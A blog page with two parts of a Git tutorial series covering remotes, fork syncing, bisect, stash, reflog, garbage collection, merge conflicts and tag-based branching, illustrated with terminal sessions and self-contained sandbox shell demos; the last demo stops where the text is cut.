
Git Is The Answer 3/3

Published on 26 March 2013 by Răzvan Deaconescu and Mihai Maruseac

Finally, the third article on advanced Git topics focuses on features that many of you will use only in very special cases.

Handling Multiple Remotes

There are situations when you decide to use multiple remotes for a repository. For example, I’m using multiple remotes for my snippets repository:

razvan@einherjar:~/code$ git remote show
gh
gl
glcs
origin

razvan@einherjar:~/code$ cat .git/config
[remote "origin"]
    fetch = +refs/heads/*:refs/remotes/origin/*
    url = razvan@swarm.cs.pub.ro:git-repos/code.git
[remote "gh"]
    url = git@github.com:razvand/snippets.git
    fetch = +refs/heads/*:refs/remotes/gh/*
[remote "gl"]
    url = git@gitlab.com:razvand/mine.git
    fetch = +refs/heads/*:refs/remotes/gl/*
[remote "glcs"]
    url = git@gitlab.cs.pub.ro:razvan.deaconescu/code.git
    fetch = +refs/heads/*:refs/remotes/glcs/*
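A configuration like the one above is what git remote add writes for you. Below is a minimal sketch that runs in a throwaway repository created with mktemp (an assumption of the sketch). The URLs are the ones shown above. Nothing is contacted, because adding a remote does not use the network:

```shell
set -eu
tmp=$(mktemp -d)
trap 'rm -rf "$tmp"' EXIT
git init -q "$tmp/code"
cd "$tmp/code"

# Each call adds a [remote "<name>"] section with a url and a fetch refspec
# that maps the remote's branches into refs/remotes/<name>/*.
git remote add origin razvan@swarm.cs.pub.ro:git-repos/code.git
git remote add gh git@github.com:razvand/snippets.git
git remote add gl git@gitlab.com:razvand/mine.git
git remote add glcs git@gitlab.cs.pub.ro:razvan.deaconescu/code.git

remotes=$(git remote | sort | tr '\n' ' ')
gh_fetch=$(git config remote.gh.fetch)
echo "remotes: $remotes"
echo "gh fetch refspec: $gh_fetch"
```

From then on, git fetch --all fetches from every remote, while git push gh master pushes to a single one.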

One situation that requires multiple remotes is working on a fork of a GitHub repository and submitting pull requests. This is also described in the “Syncing a fork” article on GitHub.

After you fork a repository on GitHub, you clone that fork. For example, I forked the ROSEdu site repository into my own account, cloned the fork, worked on the local clone and then pushed the changes. I would then create a pull request with those changes, so that they would be integrated into the main repository.

A problem arises when the fork falls out of sync with the main repository. Ideally, GitHub would offer an option to sync the fork. Since it doesn’t, the fork has to be updated manually, through the local copy, as described in the “Syncing a fork” article on GitHub.

First of all, you need to add the main repository as another remote to the local repository. This is a read-only remote. As suggested by GitHub, I’ve named this new remote upstream:

razvan@einherjar:~/projects/rosedu/site/site.git$ git remote show
origin
upstream
razvan@einherjar:~/projects/rosedu/site/site.git$ git remote show upstream
* remote upstream
  Fetch URL: git@github.com:rosedu/site.git
[...]

In order to sync the local repository with the upstream remote (the main repository) just fetch and rebase changes:

razvan@einherjar:~/projects/rosedu/site/site.git$ git fetch upstream
remote: Counting objects: 16, done.
remote: Compressing objects: 100% (7/7), done.
remote: Total 11 (delta 6), reused 9 (delta 4)
Unpacking objects: 100% (11/11), done.
From github.com:rosedu/site
   d21f23f..7411020  master     -> upstream/master
razvan@einherjar:~/projects/rosedu/site/site.git$ git rebase upstream/master
First, rewinding head to replay your work on top of it...
Fast-forwarded master to upstream/master.

These changes are then pushed to the origin remote (the forked repository):

razvan@einherjar:~/projects/rosedu/site/site.git$ git push origin master
Counting objects: 16, done.
Delta compression using up to 4 threads.
Compressing objects: 100% (11/11), done.
Writing objects: 100% (11/11), 1.99 KiB, done.
Total 11 (delta 6), reused 0 (delta 0)
To git@github.com:razvand/site.git
   6f3dd4d..7411020  master -> master

New local changes are then pushed to the origin remote and grouped into pull requests for the upstream remote (the main repository), which is now in sync with the fork.

The above is a specific use case for syncing a fork on GitHub, using two remotes: one for the original repository and one for the fork. The excellent GitHub article describes in detail the steps you need to take to sync your fork.
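You can rehearse the whole round trip without GitHub. This sketch rests on a few assumptions. Local bare repositories with the hypothetical names upstream.git and fork.git stand in for the main repository and the fork. A throwaway Demo identity is set through Git's environment variables:

```shell
set -eu
tmp=$(mktemp -d)
trap 'rm -rf "$tmp"' EXIT
export GIT_AUTHOR_NAME=Demo GIT_AUTHOR_EMAIL=demo@example.com
export GIT_COMMITTER_NAME=Demo GIT_COMMITTER_EMAIL=demo@example.com

# A seed repository provides the first commit of the main project.
git init -q "$tmp/seed"
cd "$tmp/seed"
git symbolic-ref HEAD refs/heads/master
echo v1 > index.md
git add index.md
git commit -qm 'Initial page'

# Hypothetical stand-ins: upstream.git is the main repository,
# fork.git is the fork (what GitHub's Fork button would create).
git clone -q --bare "$tmp/seed" "$tmp/upstream.git"
git clone -q --bare "$tmp/upstream.git" "$tmp/fork.git"

# Clone the fork (origin points at fork.git) and add upstream by hand.
git clone -q "$tmp/fork.git" "$tmp/site"
cd "$tmp/site"
git remote add upstream "$tmp/upstream.git"

# Meanwhile, the main repository moves on.
cd "$tmp/seed"
echo v2 >> index.md
git commit -qam 'Update page'
git push -q "$tmp/upstream.git" master

# Sync: fetch upstream, rebase onto it, push the result to the fork.
cd "$tmp/site"
git fetch -q upstream
git rebase -q upstream/master
git push -q origin master

upstream_head=$(git rev-parse upstream/master)
fork_head=$(git --git-dir="$tmp/fork.git" rev-parse master)
```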

Bisecting the History

A powerful feature of Git is its ability to quickly find the commit that introduced a bug. Suppose your application has a bug:

$ ./test_math.py 
2 + 3 = 6

Often, the bug was introduced several commits back, which makes it hard to track down by debugging alone. Git comes to the rescue with git bisect. First, start the process with git bisect start. Then mark a good commit and a bad commit, the boundaries of the bisect range (with no argument, git bisect bad marks the current commit):

$ git bisect start
$ git bisect good 368297b26ac1f0dc4
$ git bisect bad
Bisecting: 7 revisions left to test after this (roughly 3 steps)
[9e7e7252bc95453817187ef4f1a8d69fd4ed74d7] Modify test_math.py

Git has checked out a commit in the middle of the range. Test your code again to see whether the bug is present, then tell git bisect whether this commit is good or bad:

$ ./test_math.py
2 + 3 = 5
$ git bisect good
Bisecting: 3 revisions left to test after this (roughly 2 steps)
[1c6fddb664ce6cb7bb483b8413b8e1216666c89f] Modify test_math.py (4).

Continue this process until there are no more commits left in range.

$ git bisect good 
1c6fddb664ce6cb7bb483b8413b8e1216666c89f is the first bad commit
commit 1c6fddb664ce6cb7bb483b8413b8e1216666c89f
Author: Andrei Petre <p31andrei@gmail.com>
Date:   Sat Mar 9 00:24:43 2013 +0200

    Modify test_math.py (4).

Git even shows you the commit and its message. Now run git show to see the changes introduced by the bad commit:

$ git show 1c6fddb664ce6cb7bb
commit 1c6fddb664ce6cb7bb483b8413b8e1216666c89f
Author: Andrei Petre <p31andrei@gmail.com>
Date:   Sat Mar 9 00:24:43 2013 +0200

    Modify test_math.py (4).

diff --git a/test_math.py b/test_math.py
index a6624f7..6e7f061 100755
--- a/test_math.py
+++ b/test_math.py
@@ -4,7 +4,7 @@ def custom_sum(*args):
     """Calculate the sum of two given numbers.
        Make the sum work for multiple arguments
     """
-    crt = 0
+    crt = 1
     for var in args:
         crt += var
     return crt

When you are done, run git bisect reset to return to the starting point. Then fix the bug, commit, and continue contributing to the project.

Finally, you can use git bisect with automated tests. Start the bisection with git bisect start, this time passing the two end points (the bad commit first, then the good one):

$ git bisect start HEAD 368297b26ac1f0dc4
Bisecting: 7 revisions left to test after this (roughly 3 steps)
[9e7e7252bc95453817187ef4f1a8d69fd4ed74d7] Modify test_math.py

Then use git bisect run with a script that exits with 0 if the code is good. If the bug is still present, the script should exit with a code between 1 and 127, except 125, which means “skip this commit”. Git will do the bisection for you.

[mihai@esgaroth repo3]$ git bisect run ./test.sh
running ./test.sh
Bisecting: 3 revisions left to test after this (roughly 2 steps)
[1c6fddb664ce6cb7bb483b8413b8e1216666c89f] Modify test_math.py (4).
running ./test.sh
Bisecting: 1 revision left to test after this (roughly 1 step)
[d8a251d8348ac236d344a00b50a987e2af726663] Modify test_math.py (2).
running ./test.sh
Bisecting: 0 revisions left to test after this (roughly 0 steps)
[2a084b613f6b69cc8eb44648b8b5665402f5d9c0] Modify test_math.py (3).
running ./test.sh
1c6fddb664ce6cb7bb483b8413b8e1216666c89f is the first bad commit
commit 1c6fddb664ce6cb7bb483b8413b8e1216666c89f
Author: Andrei Petre <p31andrei@gmail.com>
Date:   Sat Mar 9 00:24:43 2013 +0200

    Modify test_math.py (4).

bisect run success
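The article does not show the test.sh script used above. The following self-contained sketch reproduces the automated bisection. Several pieces are hypothetical: sum.sh (standing in for test_math.py), test.sh, and the eight commits. The fifth commit plants the same kind of bug as above, with the sum starting at 1 instead of 0:

```shell
set -eu
tmp=$(mktemp -d)
trap 'rm -rf "$tmp"' EXIT
export GIT_AUTHOR_NAME=Demo GIT_AUTHOR_EMAIL=demo@example.com
export GIT_COMMITTER_NAME=Demo GIT_COMMITTER_EMAIL=demo@example.com
git init -q "$tmp/repo"
cd "$tmp/repo"

# Eight commits; from the fifth one on, the sum wrongly starts at 1.
for i in 1 2 3 4 5 6 7 8; do
    if [ "$i" -ge 5 ]; then start=1; else start=0; fi
    printf 'crt=%s\nfor v in "$@"; do crt=$((crt + v)); done\necho "$crt"\n' \
        "$start" > sum.sh
    echo "$i" > step            # makes every commit non-empty
    git add sum.sh step
    git commit -qm "Modify sum.sh ($i)"
    if [ "$i" -eq 1 ]; then good=$(git rev-parse HEAD); fi
    if [ "$i" -eq 5 ]; then planted=$(git rev-parse HEAD); fi
done

# Hypothetical test script, kept outside the repository:
# exit 0 = good, 1 = bad (125 would mean "skip this commit").
cat > "$tmp/test.sh" <<'EOF'
#!/bin/sh
[ "$(sh sum.sh 2 3)" = 5 ]
EOF
chmod +x "$tmp/test.sh"

git bisect start HEAD "$good" >/dev/null    # bad end first, then good
git bisect run "$tmp/test.sh" >/dev/null
first_bad=$(git rev-parse refs/bisect/bad)  # the commit bisect settled on
git bisect reset >/dev/null 2>&1
```

The script only has to follow the exit-code convention. It could just as well run make test or a Python test suite.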

This is indeed a good tool to have in Git’s toolbox.

Stashing the Goodies

It often happens that you’ve made some changes that you don’t want to commit yet, but you need to sync with the remote repository (i.e. do a pull). Or you want to merge a branch without committing your changes. In these cases, the solution is to use the stash.

The stash is a special place where Git temporarily stores your changes, leaving your working directory clean:

razvan@einherjar:~/projects/rosedu/site/site.git$ git status
# On branch master
# Changes not staged for commit:
#   (use "git add <file>..." to update what will be committed)
#   (use "git checkout -- <file>..." to discard changes in working directory)
#
#	modified:   irc.markdown
#
no changes added to commit (use "git add" and/or "git commit -a")
razvan@einherjar:~/projects/rosedu/site/site.git$ git stash
Saved working directory and index state WIP on master: 7411020 Remove a stupid Maruku error.
HEAD is now at 7411020 Remove a stupid Maruku error.
razvan@einherjar:~/projects/rosedu/site/site.git$ git status
# On branch master
nothing to commit (working directory clean)
razvan@einherjar:~/projects/rosedu/site/site.git$ git stash pop
# On branch master
# Changes not staged for commit:
#   (use "git add <file>..." to update what will be committed)
#   (use "git checkout -- <file>..." to discard changes in working directory)
#
#	modified:   irc.markdown
#
no changes added to commit (use "git add" and/or "git commit -a")
Dropped refs/stash@{0} (940f594b5f93e616dc16285e0677fbc78aa33620)

The moment you stash your changes, they “disappear” from the working directory. You can get them back with git stash pop.

When multiple users are working on a given repository, you will often need to pull their updates to see what has been done. Your local copy may contain changes of your own that are still far from ready to commit. In that case, stash your changes, pull the remote updates to sync your repository, and then pop the stash to continue your work.
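Here is a minimal sketch of the stash round trip in a throwaway repository. The file irc.markdown is reused from the output above as a placeholder, and the pull itself is left out:

```shell
set -eu
tmp=$(mktemp -d)
trap 'rm -rf "$tmp"' EXIT
export GIT_AUTHOR_NAME=Demo GIT_AUTHOR_EMAIL=demo@example.com
export GIT_COMMITTER_NAME=Demo GIT_COMMITTER_EMAIL=demo@example.com
git init -q "$tmp/site"
cd "$tmp/site"
echo '# IRC' > irc.markdown
git add irc.markdown
git commit -qm 'Add IRC page'

echo 'Half-written paragraph' >> irc.markdown   # not ready to commit
before=$(git status --porcelain)
git stash -q                  # save the change and reset the working tree
during=$(git status --porcelain)
# ... git pull or git merge would run here, on a clean tree ...
git stash pop -q              # re-apply the change and drop the stash entry
after=$(git status --porcelain)
stashes=$(git stash list)
```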

A Reference For Everything

We are near the end of the series. You have learned several things and may try others on your own. From time to time, though, you may find that you have lost a commit while experimenting. Or you rebased at some point in the past and now need a commit that was skipped. Or you used git reset --hard and threw away a commit you needed.

Luckily, Git rarely loses anything for good. Commits that are no longer on any branch can usually be recovered, at least until they are garbage collected, by using a nice feature called the reflog (reference log). Let’s see it in action first.

$ git reflog
096bec6 HEAD@{0}: commit: Add suggestion from Stefan Bucur.
8647ca7 HEAD@{1}: rebase finished: returning to refs/heads/master
8647ca7 HEAD@{2}: checkout: moving from master to 8647ca7c213ef26fe3426e079356a8b9c0ef1a8f^0
f020807 HEAD@{3}: commit: Ready to publish «Git is the answer - part 2» article.
274c7bc HEAD@{4}: rebase finished: returning to refs/heads/master
274c7bc HEAD@{5}: checkout: moving from master to 274c7bcc89487e3b3e5f935694046caf17bf005f^0
97b6f11 HEAD@{6}: commit: Add TODO for conclusions.

The first column lists the commit hash that the reference pointed to at that point. The second is the position of HEAD (HEAD@{1} is where HEAD was before its latest move, and so on). Then comes a short description of what moved the reference (a commit, a checkout, a merge, a reset, etc.), which helps you remember what each entry was about.

To recover a commit, cherry-pick it using its hash from the reflog or its HEAD@{n} reference. Alternatively, create a branch pointing at it.
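Here is a short recovery sketch. It assumes a throwaway repository in which a commit is discarded with git reset --hard and then brought back from the reflog:

```shell
set -eu
tmp=$(mktemp -d)
trap 'rm -rf "$tmp"' EXIT
export GIT_AUTHOR_NAME=Demo GIT_AUTHOR_EMAIL=demo@example.com
export GIT_COMMITTER_NAME=Demo GIT_COMMITTER_EMAIL=demo@example.com
git init -q "$tmp/article"
cd "$tmp/article"
echo 'Part 1' > draft.md
git add draft.md
git commit -qm 'Start article'
echo 'Part 2' >> draft.md
git commit -qam 'Add TODO for conclusions'

git reset -q --hard HEAD~1    # the second commit is no longer on any branch
git reflog -n 2               # ...but HEAD@{1} still records it
lost=$(git rev-parse 'HEAD@{1}')

git cherry-pick "$lost" >/dev/null   # re-apply its change on top of HEAD
last_line=$(tail -n 1 draft.md)
subject=$(git log -1 --format=%s)
```

If you need the lost commit itself rather than a copy of its change, git branch rescued HEAD@{1} points a new branch at it (the branch name is arbitrary).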

Garbage Collecting the Repository

Finally, let’s focus on trimming down the disk usage of the repository by dropping old reflog entries. First, we expire the entries older than a given date:

$ git reflog expire --expire=1.day refs/heads/master

The above removes all entries older than one day from the reflog of master.

The second step is to find all unreachable objects:

$ git fsck --unreachable
Checking object directories: 100% (256/256), done.
Checking objects: 100% (80/80), done.
unreachable blob 0aa0869906576afbe970251418982a5ae1a21698
unreachable blob c1b86d806044ba5e344e037ec0128f7e944d0e0f
unreachable blob 1f4998496071654c1b16eb33932d9d8b4fee5971
unreachable tree 4b825dc642cb6eb9a060e54bf8d69288fbee4904
unreachable blob d9024465bff70288deaa116a646c01f1af7170b6
unreachable blob ec1a48a4de254e80e803b4a4daa4a1f87fe4acea
unreachable blob f0c2af9359d0c360fae9779f8c8b3143e7002810
unreachable blob 17135e0a43db16a2d127a4cb2a692b41257c8c26
unreachable tree 39d3a7c06c75d063cc13adde71b745f412a6f84f
unreachable tree fad372db5c9c9b842d3786733437c5e32dda426b
unreachable blob 07c469400c9ed887416d16a178a28cb911e6634e
unreachable tree 8c1deacee70bb3329ae6cd4fa2fbf546395ea712
unreachable blob ad85a1ec621c5b58fd6876c4d88982406bd48156
unreachable tree c865c8cb1344f77363c5314a91344623fe0dd661
unreachable blob cdd55939c346385b7938f392f958812b4fa5ddaf
unreachable blob d8255f99d74b09435a70ad3f2b23b0e69babc818
unreachable blob f7ddf120540a448c50baba1047230e9ad7d687ac
unreachable tree 30ce2c01c2792fdc4dfa6ab5c3e0c1cb876a405a
unreachable blob 09cf62d09bb027f7cfabcb0333c1837fda3c9c92
unreachable blob 435716d9434a852229aee58d16104c3335684113
unreachable blob 974f61a4933ee5608b1810e569593adf2ffedd0b
unreachable tree b3df14961958afa1b0434c1a31065751fef3b30d

Finally, we prune everything and then garbage collect the repository.

$ git prune
$ git gc
Counting objects: 652, done.
Delta compression using up to 4 threads.
Compressing objects: 100% (637/637), done.
Writing objects: 100% (652/652), done.
Total 652 (delta 373), reused 64 (delta 10)

We can check the reduction in size by running du . before and after the process. For this repository, we saved 3 MB of space, not quite an impressive feat. For rapidly changing projects, however, the gains may be higher.
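You can try the sequence on a throwaway repository. The sketch differs from the commands above in one stated assumption: it expires the reflogs of all references (--expire=now --all), because an entry in the HEAD reflog alone keeps an old commit reachable. The experiment branch and the big.bin file are hypothetical:

```shell
set -eu
tmp=$(mktemp -d)
trap 'rm -rf "$tmp"' EXIT
export GIT_AUTHOR_NAME=Demo GIT_AUTHOR_EMAIL=demo@example.com
export GIT_COMMITTER_NAME=Demo GIT_COMMITTER_EMAIL=demo@example.com
git init -q "$tmp/repo"
cd "$tmp/repo"
git symbolic-ref HEAD refs/heads/master
echo notes > notes.txt
git add notes.txt
git commit -qm 'Add notes'

# A hypothetical experiment commits a large file and is then thrown away.
git checkout -q -b experiment
seq 1 200000 > big.bin
git add big.bin
git commit -qm 'Add big file'
blob=$(git rev-parse HEAD:big.bin)
git checkout -q master
git branch -q -D experiment   # now only the HEAD reflog still mentions it

git reflog expire --expire=now --all          # drop every reflog entry
found=$(git fsck --unreachable 2>/dev/null | grep -c "$blob" || true)
git prune                                     # delete unreachable loose objects
git gc -q                                     # repack what is left
if git cat-file -e "$blob" 2>/dev/null; then gone=no; else gone=yes; fi
```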

Finally, looking at the reflog, we see:

$ git reflog --all
16a82d6 refs/remotes/gh/master@{0}: update by push
d3f979f refs/remotes/gh/master@{1}: update by push
454935e refs/remotes/gh/master@{2}: pull --rebase: fast-forward
bae10c0 refs/remotes/gh/master@{3}: update by push
c0a692b refs/remotes/gh/master@{4}: pull --rebase: fast-forward
04c5a1b refs/remotes/gh/master@{5}: pull --rebase: fast-forward
745963b refs/remotes/gh/master@{6}: pull --rebase: fast-forward
fd23db9

The last line shows the id of one commit, but nothing else about it. You can still reset or rebase to it, but you cannot reach anything older through the reflog.

Closing Up

We are at the close of this three-part article on advanced Git usage. Some of the things presented here might make you ask: “When will I ever use that?” Some of them will prove useful from time to time, while others are simply good to know.

In the end, remember that Git is the Swiss Army knife of VCSs. It has a lot of features that will make us masters of it, should we learn and practice using them. As with Vim, above a certain threshold Git can only be learnt by using it on a day-to-day basis.

Git Is The Answer 2/3

Published on 22 March 2013 by Răzvan Deaconescu and Mihai Maruseac

The second article on advanced git topics is focused on cases where multiple branches are involved.

My Changes Conflict With Yours

It often happens that two developers are working on the same file. Git tries its best to merge the changesets from both developers without complaining. However, Git is not a human being. When two changes are too close to one another in the file, it cannot know which one is right.

As opposed to SVN, in Git it is the responsibility of whoever pulls to resolve conflicts. Thus, you are forced to resolve conflicts before you can push your changes upstream. But how does it work?

When you pull changes that conflict with your own, Git stops with a rather cryptic message. Here we use git pull --rebase instead of plain git pull:

Using index info to reconstruct a base tree...
M   numbers
Falling back to patching base and 3-way merge...
Auto-merging numbers
CONFLICT (content): Merge conflict in numbers
Failed to merge in the changes.
Patch failed at 0001 Add a don't like line.
The copy of the patch that failed is found in:
   /tmp/repos/repo3/.git/rebase-apply/patch

When you have resolved this problem, run "git rebase --continue".
If you prefer to skip this patch, run "git rebase --skip" instead.
To check out the original branch and stop rebasing, run "git rebase --abort".

Even the file you changed looks awkward:

4
<<<<<<< HEAD
insert here 5
=======
I don't like this line 5
>>>>>>> Add a don't like line.
6

As you can see, three lines have been inserted. The ones starting with <<<<<<< and >>>>>>> mark the boundaries of the conflicting area, as well as the origin of the two conflicting changes. During a rebase, HEAD is the latest commit from the remote, onto which your local commits are being replayed. Add a don't like line. is the message of your own local commit that failed to apply.

Between the two marks, you have the two changes, separated by =======. You, as a developer, have to choose what makes sense: either keep only one of the changes, merge them together or even write something totally new.

Edit the file so that it contains the desired result, and stage it. Then simply continue the rebase:

git add numbers
git rebase --continue

If there are more conflicting changes, repeat the same procedure. Otherwise, you can go on to push your changes. As you can see, no conflict ever leaves your repository: you are forced to deal with it before continuing.

Note: Remember to resolve every conflict in a file before continuing the rebase. Otherwise, the leftover conflict markers will be committed. (This note was suggested in the comments by Stefan Bucur.)
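You can reproduce the conflict end to end. This sketch assumes a local bare repository (shared.git) standing in for the remote, with two clones playing the two developers. The numbers file mirrors the example above. GIT_EDITOR=true only stops Git from opening an editor when the rebase continues:

```shell
set -eu
tmp=$(mktemp -d)
trap 'rm -rf "$tmp"' EXIT
export GIT_AUTHOR_NAME=Demo GIT_AUTHOR_EMAIL=demo@example.com
export GIT_COMMITTER_NAME=Demo GIT_COMMITTER_EMAIL=demo@example.com
export GIT_EDITOR=true

# Seed a shared bare repository with a file holding the numbers 1..9.
git init -q "$tmp/seed"
cd "$tmp/seed"
git symbolic-ref HEAD refs/heads/master
seq 1 9 > numbers
git add numbers
git commit -qm 'Add numbers'
git clone -q --bare "$tmp/seed" "$tmp/shared.git"
git clone -q "$tmp/shared.git" "$tmp/them"
git clone -q "$tmp/shared.git" "$tmp/me"

# The other developer changes line 5 and pushes first.
cd "$tmp/them"
sed 's/^5$/insert here 5/' numbers > numbers.new && mv numbers.new numbers
git commit -qam 'Insert here'
git push -q origin master

# I change the same line, then pull with --rebase: Git stops on a conflict.
cd "$tmp/me"
sed "s/^5\$/I don't like this line 5/" numbers > numbers.new && mv numbers.new numbers
git commit -qam "Add a don't like line."
if git pull -q --rebase origin master >/dev/null 2>&1; then stopped=no; else stopped=yes; fi
markers=$(grep -c '^<<<<<<<' numbers || true)

# Resolve by keeping both lines, stage the file, continue the rebase.
{ seq 1 4; echo 'insert here 5'; echo "I don't like this line 5"; seq 6 9; } > numbers
git add numbers
git rebase --continue >/dev/null 2>&1
leftover=$(grep -c '^[<=>]\{7\}' numbers || true)
commits=$(git rev-list --count HEAD)
git push -q origin master
```

Here the conflict is resolved by keeping both lines. Keeping only one of them, or writing something new, works the same way.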

Tags and Branches For The Win

Tags are the best way to keep references to old commits. They are particularly helpful in school-related activities, where you update lectures and lab tasks on a yearly basis.

The right way to handle this is to create a tag at the end of each year and update labs and tasks. If at any time you want to check out the old curriculum you can get back to that tag.

For example, for the SAISP repository, we’ve created a tag at the end of each year of study:

razvan@einherjar:~/school/current/saisp/repo$ git tag
2009-2010
2010-2011
2011-2012

To go back to an old version, we simply create a branch starting from that tag:

razvan@einherjar:~/school/current/saisp/repo$ git checkout -b br-2010-2011 2010-2011
Switched to a new branch 'br-2010-2011'
razvan@einherjar:~/school/current/saisp/repo$ git status
# On branch br-2010-2011
nothing to commit (working directory clean)

This allows easy organization of your tree, with no need to create other folders (one for each year). If you want to access information for a given year, you would just create a new branch.
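Here is a minimal sketch of the tag-per-year workflow in a throwaway repository. The lab1.txt file and its contents are hypothetical:

```shell
set -eu
tmp=$(mktemp -d)
trap 'rm -rf "$tmp"' EXIT
export GIT_AUTHOR_NAME=Demo GIT_AUTHOR_EMAIL=demo@example.com
export GIT_COMMITTER_NAME=Demo GIT_COMMITTER_EMAIL=demo@example.com
git init -q "$tmp/saisp"
cd "$tmp/saisp"
git symbolic-ref HEAD refs/heads/master

# One update per academic year; tag the state at the end of each year.
for year in 2009-2010 2010-2011 2011-2012; do
    echo "Lab 1, version $year" > lab1.txt
    git add lab1.txt
    git commit -qm "Update labs for $year"
    git tag "$year"
done

# Revisit an old curriculum on a branch created from its tag.
git checkout -q -b br-2010-2011 2010-2011
old_lab=$(cat lab1.txt)
branch=$(git rev-parse --abbrev-ref HEAD)
git checkout -q master
tags=$(git tag | tr '\n' ' ')
```

Like the commands above, the sketch uses lightweight tags. By contrast, git tag -a creates an annotated tag, which also records who created it, when, and a message.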

This isn’t the case for the current CDL repository. I’m not particularly happy with it and will probably update it soon. Because we weren’t very Git-aware when we created the repository, we started using a folder for each year:

razvan@einherjar:~/projects/rosedu/cdl/repo.git$ ls
2009  2010  2011  2012  2013  Makefile  curs1  git_tutorial  template  util

This is unnecessary and results in duplicate information, copied from one year to the other.

The solution is pretty simple: identify the last commit of each CDL session/year, tag it and then, if required, create branches from it.

Identifying the last commit for each CDL session is easily done through gitk. Browse the commits, look at the dates, identify the last commit and create a tag:

razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git tag 2009 e9858a9e74
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git tag 2010 26cd285f47
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git tag 2011-spring eaa2d7e9a8
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git tag 2011-fall f69e679ebd
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git tag 2012 fd23db9181

Afterwards, we can create branches for each of them to easily go to that point:

razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git branch br-2012 2012
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git branch br-2011-fall 2011-fall
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git branch br-2011-spring 2011-spring
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git branch br-2010 2010
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git branch br-2009 2009
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git branch
  br-2009
  br-2010
  br-2011-fall
  br-2011-spring
  br-2012
* master
  old-master
  razvan

Of course, it only makes sense to really clean up the repository and turn it into a “normal” one that stores only current information. Remove the old years’ data and keep only the current one:

razvan@einherjar:~/projects/rosedu/cdl/repo.git$ ls
2009  2010  2011  2012  2013  Makefile  curs1  git_tutorial  template  util
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git rm -r 2009
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git rm -r 2010
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git rm -r 2011
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git rm -r 2012
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git mv 2013/* .
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ rmdir 2013
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ ls
Makefile  curs1  curs3  git.mm  git_tutorial  schelet_inscriere  template  util
razvan@einherjar:~/projects/rosedu/cdl/repo.git$ git commit -m 'Clear folder structure. Leave only current items'

All is now nice and clear. Any updates are going to be done on the current folder structure; any request to see old data can be handled by checking out one of the branches.
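A small sketch can check the key point: old data stays reachable after the cleanup. The folder and file names are hypothetical and only mimic the CDL layout:

```shell
set -eu
tmp=$(mktemp -d)
trap 'rm -rf "$tmp"' EXIT
export GIT_AUTHOR_NAME=Demo GIT_AUTHOR_EMAIL=demo@example.com
export GIT_COMMITTER_NAME=Demo GIT_COMMITTER_EMAIL=demo@example.com
git init -q "$tmp/cdl"
cd "$tmp/cdl"

# Hypothetical folder-per-year layout, as in the old CDL repository.
mkdir 2012 2013
echo 'slides, 2012 edition' > 2012/curs1.txt
echo 'slides, 2013 edition' > 2013/curs1.txt
git add .
git commit -qm 'Slides for 2012 and 2013'
git tag 2012
git branch br-2012 2012

# Keep only the current year at the top level.
git rm -q -r 2012
git mv 2013/curs1.txt .
if [ -d 2013 ]; then rmdir 2013; fi   # Git does not track empty folders
git commit -qm 'Clear folder structure. Leave only current items'

current=$(git ls-files | tr '\n' ' ')
old=$(git show br-2012:2012/curs1.txt)   # old data is one branch away
```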

Branches on a Virtual Machine

In our experience, we often need to work both on the desktop/laptop and on a virtual machine. Of course, we use Git to store the code, so it only makes sense for one repository to be a remote of the other. With Git, any repository can be a remote.

So I create a clone of the laptop repository on the virtual machine. I usually do that with the SO2 repository when updating lab tasks or assignment solutions and tests. The laptop stores the main repository and the virtual machine uses a clone of it:

root@spook:~# git clone razvan@einherjar.local:school/current/so2/git-repos/lab lab.git
root@spook:~# cd lab.git/
root@spook:~/lab.git# git remote show origin
* remote origin
  Fetch URL: razvan@einherjar.local:school/current/so2/git-repos/lab
  Push  URL: razvan@einherjar.local:school/current/so2/git-repos/lab
[...]

To work properly with the remote, you need a dedicated branch to push to. You’ll run into problems if you push to the master branch of a repository that has master checked out. By default, Git refuses such a push into a non-bare repository. I usually call this branch ‘vm’ (for virtual machine):

root@spook:~/lab.git# git checkout -b vm
Switched to a new branch 'vm'

Any further changes are going to be committed in the ‘vm’ branch. Subsequently you would push these commits to the main repository, on the laptop:

root@spook:~/lab.git# git push origin vm
Total 0 (delta 0), reused 0 (delta 0)
To razvan@einherjar.local:school/current/so2/git-repos/lab
 * [new branch]      vm -> vm

On the main repository, you would just merge or rebase your changes from that branch:

razvan@einherjar:~/school/current/so2/git-repos/teme$ git rebase vm
First, rewinding head to replay your work on top of it...
Fast-forwarded master to vm.

At this point, all changes from the clone on the virtual machine are present in the master branch of the repository on the laptop. This is why you create a separate branch on the virtual machine clone and push that branch to the main repository. If you worked on the master branch of the clone and pushed that, it would be problematic to integrate those changes into the master branch of the main repository.
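You can simulate the laptop/virtual machine setup with two local repositories. This sketch assumes a sandboxed HOME, so that personal Git settings do not interfere. It also checks the claim above: by default (the receive.denyCurrentBranch setting), Git refuses a push that would update the checked-out master of a non-bare repository:

```shell
set -eu
tmp=$(mktemp -d)
trap 'rm -rf "$tmp"' EXIT
export HOME="$tmp" GIT_CONFIG_NOSYSTEM=1   # ignore personal/system Git config
unset XDG_CONFIG_HOME
export GIT_AUTHOR_NAME=Demo GIT_AUTHOR_EMAIL=demo@example.com
export GIT_COMMITTER_NAME=Demo GIT_COMMITTER_EMAIL=demo@example.com

# "laptop": the main, non-bare repository, with master checked out.
git init -q "$tmp/laptop"
cd "$tmp/laptop"
git symbolic-ref HEAD refs/heads/master
echo 'lab 1' > lab1.txt
git add lab1.txt
git commit -qm 'Add lab 1'

# "vm": a clone of it; work happens on a dedicated branch.
git clone -q "$tmp/laptop" "$tmp/vm"
cd "$tmp/vm"
git checkout -q -b vm
echo 'solution' > sol1.txt
git add sol1.txt
git commit -qm 'Add lab 1 solution'

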